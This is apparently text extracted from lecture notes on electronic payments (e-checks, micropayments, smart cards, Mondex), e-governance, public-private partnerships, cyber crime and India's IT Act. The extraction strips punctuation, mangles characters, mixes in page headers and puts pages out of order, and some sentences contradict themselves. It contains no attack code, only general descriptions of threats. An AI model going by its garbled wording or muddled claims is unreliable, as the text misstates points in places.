Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
